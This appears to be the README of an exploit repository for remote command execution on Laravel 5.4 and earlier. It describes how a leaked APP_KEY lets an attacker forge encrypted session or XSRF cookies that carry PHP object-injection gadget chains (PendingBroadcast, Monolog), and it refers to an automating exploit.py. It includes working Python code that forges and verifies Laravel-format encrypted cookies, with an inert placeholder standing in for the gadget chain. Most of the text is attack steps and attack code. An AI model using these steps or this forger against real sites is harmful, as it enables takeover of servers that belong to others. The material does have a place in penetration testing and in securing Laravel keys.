Simple script to exploit Remote Command Execution (RCE) on Laravel <= 5.4. To use this script you must know the target's APP_KEY (the application encryption key from its .env file); without it the forged cookie fails the MAC check and is never decrypted.
- Laravel decrypts incoming cookies with APP_KEY and then passes the plaintext to unserialize(). Anyone who holds APP_KEY can therefore forge a cookie whose plaintext is attacker-chosen serialized data, i.e. PHP Object Injection.
- PHP Object Injection escalates to Remote Command Execution because usable gadget chains exist in Laravel's PendingBroadcast.php and in Monolog: classes whose magic methods (such as __destruct) act on attacker-controlled object properties during unserialization or object destruction.
- Generate the serialized PHP Object Injection payload, encrypt it with APP_KEY in Laravel's cookie format (AES-CBC ciphertext plus an HMAC-SHA256 over the base64 IV and ciphertext, wrapped in base64-encoded JSON), and set the laravel_session or XSRF-TOKEN cookie to the result. (Some sites rename laravel_session; check the cookie names the target actually sets.)
- Reload the page: the cookie-decryption middleware verifies the MAC, decrypts and unserializes the payload, and the command executes.
exploit.py automates these steps.
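The cookie-forging step from the list above, as an added example that is not the repository's exploit.py: it re-implements Laravel 5.4's Encrypter format (AES-CBC, PKCS7 padding, HMAC-SHA256 over base64(iv) || base64(ciphertext), base64-encoded JSON envelope with iv/value/mac keys) on both the forging and the receiving side, stopping right before the point where Laravel would call unserialize(). It assumes the `cryptography` package is installed. The APP_KEY is a constructed 32-byte key in the `base64:` form Laravel writes to .env, and the serialized payload is a harmless constructed stdClass placeholder standing in for a real gadget chain, so the example stays inert.

```python
"""Forge and verify a Laravel 5.4-style encrypted cookie around a raw serialized payload."""
import base64
import hashlib
import hmac
import json
import os
from typing import Optional

from cryptography.hazmat.primitives import padding
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes

# Constructed example key: 32 bytes in the "base64:" form Laravel stores in .env.
EXAMPLE_APP_KEY = "base64:" + base64.b64encode(b"\x11" * 32).decode()

# Constructed placeholder for the serialized gadget chain. In a real run this is the
# PHP Object Injection payload; here it is an inert serialized stdClass.
PLACEHOLDER_SERIALIZED = b'O:8:"stdClass":1:{s:4:"note";s:11:"placeholder";}'


def load_app_key(app_key: str) -> bytes:
    """Mirror Laravel's key handling: strip the 'base64:' prefix and decode it."""
    if app_key.startswith("base64:"):
        return base64.b64decode(app_key[len("base64:"):])
    return app_key.encode()


def laravel_mac(key: bytes, iv_b64: str, value_b64: str) -> str:
    """Hex HMAC-SHA256 over base64(iv) || base64(ciphertext), as Encrypter::hash() does."""
    return hmac.new(key, (iv_b64 + value_b64).encode(), hashlib.sha256).hexdigest()


def forge_cookie(app_key: str, serialized_payload: bytes, iv: Optional[bytes] = None) -> str:
    """Encrypt the raw serialized string (not serialize() of it) so decrypt() yields it verbatim."""
    key = load_app_key(app_key)
    if len(key) not in (16, 32):
        raise ValueError("Laravel 5.4 uses AES-128-CBC (16-byte key) or AES-256-CBC (32-byte key)")
    iv = iv or os.urandom(16)
    padder = padding.PKCS7(128).padder()
    padded = padder.update(serialized_payload) + padder.finalize()
    encryptor = Cipher(algorithms.AES(key), modes.CBC(iv)).encryptor()
    ciphertext = encryptor.update(padded) + encryptor.finalize()
    iv_b64 = base64.b64encode(iv).decode()
    value_b64 = base64.b64encode(ciphertext).decode()
    envelope = {"iv": iv_b64, "value": value_b64, "mac": laravel_mac(key, iv_b64, value_b64)}
    return base64.b64encode(json.dumps(envelope).encode()).decode()


def decrypt_cookie(app_key: str, cookie: str) -> bytes:
    """Receiving side: MAC check, then AES-CBC decrypt. Laravel would unserialize() the result."""
    key = load_app_key(app_key)
    envelope = json.loads(base64.b64decode(cookie))
    expected = laravel_mac(key, envelope["iv"], envelope["value"])
    if not hmac.compare_digest(expected, envelope["mac"]):
        raise ValueError("MAC mismatch: cookie was not built with this APP_KEY")
    iv = base64.b64decode(envelope["iv"])
    decryptor = Cipher(algorithms.AES(key), modes.CBC(iv)).decryptor()
    padded = decryptor.update(base64.b64decode(envelope["value"])) + decryptor.finalize()
    unpadder = padding.PKCS7(128).unpadder()
    return unpadder.update(padded) + unpadder.finalize()


def mac_is_valid(app_key: str, cookie: str) -> bool:
    """True only when the cookie's MAC was produced with this APP_KEY."""
    try:
        decrypt_cookie(app_key, cookie)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    forged = forge_cookie(EXAMPLE_APP_KEY, PLACEHOLDER_SERIALIZED)
    print("Cookie:", forged)
    print("Decrypts to:", decrypt_cookie(EXAMPLE_APP_KEY, forged))
```

The plaintext is encrypted as-is rather than being serialized again, because Laravel's decrypt() unserializes exactly what comes out of AES; if the ciphertext held serialize($gadget) wrapped in another serialize() layer, unserialize() would just return a string. A cookie forged under any other key fails the HMAC comparison, which is why the attack is gated on knowing APP_KEY.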
Author: Ravi Dharmawan (ravdhr@gmail.com)